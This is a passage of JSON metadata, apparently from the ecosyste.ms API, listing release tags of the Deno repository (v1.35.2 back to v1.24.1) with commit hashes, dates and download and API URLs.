and%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1